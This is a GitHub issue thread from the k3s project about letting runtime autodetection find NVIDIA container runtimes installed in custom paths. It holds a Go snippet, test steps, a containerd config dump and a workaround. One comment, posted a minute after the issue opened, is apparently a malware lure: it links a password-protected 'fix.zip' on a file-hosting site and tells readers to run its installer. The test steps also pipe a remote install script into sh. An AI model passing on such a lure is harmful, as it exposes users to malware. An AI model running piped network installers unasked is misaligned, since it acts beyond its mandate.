### ISSUE TITLE
Custom path for runtimes autodetect

### ISSUE THREAD

**Issue by Ivan-Rosa** [k3s-io/k3s#10761] opened 2024-08-28 10:38 UTC
**Is your feature request related to a problem? Please describe.**
I'm using rke2 with Flatcar OS, using a custom path to install Nvidia toolkit.
Because of this custom path, runtimes autodetect is not finding nvidia runtime.

**Describe the solution you'd like**
It would be nice to be allowed to add some custom path in https://github.com/k3s-io/k3s/blob/85e02e10d7f93e428af6a3cedc65d9260beea37a/pkg/agent/containerd/config_linux.go#L27
https://github.com/k3s-io/k3s/blob/85e02e10d7f93e428af6a3cedc65d9260beea37a/pkg/agent/containerd/config_linux.go#L61

**Comment by chenshupe** [comment] 2024-08-28 10:39
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brandond** [comment] 2024-08-28 16:11
Where does Flatcar want to put things? Can you symlink them into one of the expected paths?

**Comment by vitorsavian** [comment] 2024-09-20 12:05
@brandond maybe could we do something like this to support more paths? since we still will get the paths that we want and the user can add his path to the search too

```go
runtimesPath = "/usr/local/nvidia/toolkit:/opt/kwasm/bin"

originalPath := os.Getenv("PATH")
os.Setenv("PATH", runtimesPath + os.PathSeparator + originalPath)
extraRuntimes := findContainerRuntimes()
os.Setenv("PATH", originalPath)
```

**Comment by ShylajaDevadiga** [comment] 2024-10-09 18:22
Testing reference: https://docs.k3s.io/advanced#nvidia-container-runtime-support

**Comment by mdrahman-suse** [comment] 2024-10-11 18:52
@vitorsavian thanks for sharing the steps here: https://github.com/k3s-io/k3s/pull/10953#issue-2551043196. But I am not seeing the expected behavior when I followed the steps. Please advise if I am missing anything...

Steps:
```
export PATH=/home/ubuntu:$PATH
touch nvidia-container-runtime && chmod +x nvidia-container-runtime
curl -sfL https://get.k3s.io | INSTALL_K3S_COMMIT=e9c529530ca87484845db76a57ef80466135b2ef sh -
kubectl get nodes,pods -A -o wide
sudo cat /var/lib/rancher/k3s/agent/etc/containerd/config.toml | grep nvidia
```

```
$ k3s -v
k3s version v1.31.1+k3s-e9c52953 (e9c52953)
go version go1.22.6

ubuntu@ltsInstance2:~$ pwd
/home/ubuntu
ubuntu@ltsInstance2:~$ ls
nvidia-container-runtime

$ sudo cat /var/lib/rancher/k3s/agent/etc/containerd/config.toml
# File generated by k3s. DO NOT EDIT. Use config.toml.tmpl instead.
version = 2

[plugins."io.containerd.internal.v1.opt"]
  path = "/var/lib/rancher/k3s/agent/containerd"
[plugins."io.containerd.grpc.v1.cri"]
  stream_server_address = "127.0.0.1"
  stream_server_port = "10010"
  enable_selinux = false
  enable_unprivileged_ports = true
  enable_unprivileged_icmp = true
  sandbox_image = "rancher/mirrored-pause:3.6"

[plugins."io.containerd.grpc.v1.cri".containerd]
  snapshotter = "overlayfs"
  disable_snapshot_annotations = true



[plugins."io.containerd.grpc.v1.cri".cni]
  bin_dir = "/var/lib/rancher/k3s/data/cni"
  conf_dir = "/var/lib/rancher/k3s/agent/etc/cni/net.d"


[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
  runtime_type = "io.containerd.runc.v2"

[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
  SystemdCgroup = true

[plugins."io.containerd.grpc.v1.cri".registry]
  config_path = "/var/lib/rancher/k3s/agent/etc/containerd/certs.d"
```
@ShylajaDevadiga FYI, When I follow the below steps along with the steps that @vitorsavian has provided, I only see the default path in config.toml (in both previous and latest versions) where `nvidia-container-runtime` is installed...
- https://docs.k3s.io/advanced#nvidia-container-runtime-support
```
$ sudo cat /var/lib/rancher/k3s/agent/etc/containerd/config.toml | grep nvidia
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes."nvidia"]
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes."nvidia".options]
  BinaryName = "/usr/bin/nvidia-container-runtime"
```

**Comment by vitorsavian** [comment] 2024-10-11 22:06
@mdrahman-suse I added a PR that will make it easier and it will resolve when running with systemd

but the workaround is to
```shell
echo "PATH=${PATH}" | sudo tee -a /etc/systemd/system/k3s.service.env
```

after exporting the new PATH

**Comment by mdrahman-suse** [comment] 2024-10-14 18:55
# Validated on master branch with commit

## Environment
```
Single server, Ubuntu 22.04
```

## Test steps:
1. Install nvidia-toolkit and container-runtime from: https://docs.k3s.io/advanced#nvidia-container-runtime-support
2. Create a dummy executable
```
$ touch nvidia-container-runtime && chmod +x nvidia-container-runtime
```

**Comment by aganesh-suse** [comment] 2024-10-16 16:08
https://github.com/k3s-io/k3s/issues/10998 closing based on this.

**Closed by aganesh-suse** 2024-10-16 16:08 UTC
